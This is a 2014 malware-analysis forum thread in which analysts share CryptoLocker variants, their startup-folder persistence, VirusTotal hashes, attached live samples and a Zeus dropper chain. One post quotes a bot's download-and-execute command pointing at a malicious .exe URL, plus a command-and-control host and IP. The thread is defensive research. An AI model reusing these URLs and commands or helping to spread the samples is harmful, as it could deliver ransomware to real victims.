A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #22339  by dairu87
 Sun Mar 02, 2014 9:49 pm
Coming across more and more Cryptolockers again... Doesn't look like the same old stuff though. Doesn't appear to be running out of the old locations %localappdata% or creating the old registry keys to launch it on startup (HKLM/HKCU > Software > Microsoft > Windows > CurrentVersion > Run & RunOnce) or in (HKLM/HKCU > Software > Microsoft > WindowsNT > CurrentVersion > Winlogon). The "CryptoPrevent" that was created to stop it from running out of the old directories does not appear to be stopping it either... Looking in taskmanager there is no bad processes listed. Tried looking through Sysinternals process explorer and still not seeing anything. Has anyone seen this new version or managed to get a sample? I have another 2 or 3 clients with it on their machine so I will still be working with it and if I can manage to locate it and obtain a sample I will certainly share. :)
 #22340  by dairu87
 Sun Mar 02, 2014 10:51 pm
Found it :) Looks like it runs out of the startup directory in the start menu for every single user, including all users and the system profile. Still have a few more cases of it... If I notice anything else different will post more samples.
https://www.virustotal.com/en/file/f09b ... /analysis/ - EPUHelp.exe SHA: f09b2a3c7128875b4568598d26c03f4494c067f100df6c3f5853ce6a04a82885
https://www.virustotal.com/en/file/e1fd ... /analysis/ - 483ac69.exe SHA: e1fd365bb308126ddcceb5df5b82104f54200b84d45e29f82858557b0b341aaa
Attachments
infected
(324.12 KiB) Downloaded 104 times
 #22361  by forty-six
 Wed Mar 05, 2014 2:15 am
Fresh Cryptolocker. Different from above sample.
Code: Select all
Zeus GMO

user_execute http:// bestchoicelipo .com /download/files/small0403.exe 


POST /home/ HTTP/1.1
Host: lcbohxwxhihpjwg.biz 
Content-Length: 192
Connection: Close

IP: 195.2.77.142

Attachments
(588.75 KiB) Downloaded 147 times
 #22626  by Intimacygel
 Fri Apr 04, 2014 9:57 pm
Hi all,

I got one off a customers box today but sadly they were infected 3.27 and these samples no longer work. I'm a level 0 reverser, so my uneducated guess is that they query the server that would hold the key, see its no longer operational and then just kill/delete themselves. The info I have is based off of their AV's logging - which needless to say failed.

There are some files missing from this chain of dropping, but I was unable to grab them

file-6791126_exe
initial Zeus Dropper

Drops
Ifyxplsjpjbpdjv

Which then drops
ls44

Useful to anyone?
Attachments
infected
(605.75 KiB) Downloaded 91 times
infected
(595.7 KiB) Downloaded 83 times
infected
(8.55 KiB) Downloaded 81 times
  • 1
  • 8
  • 9
  • 10
  • 11
  • 12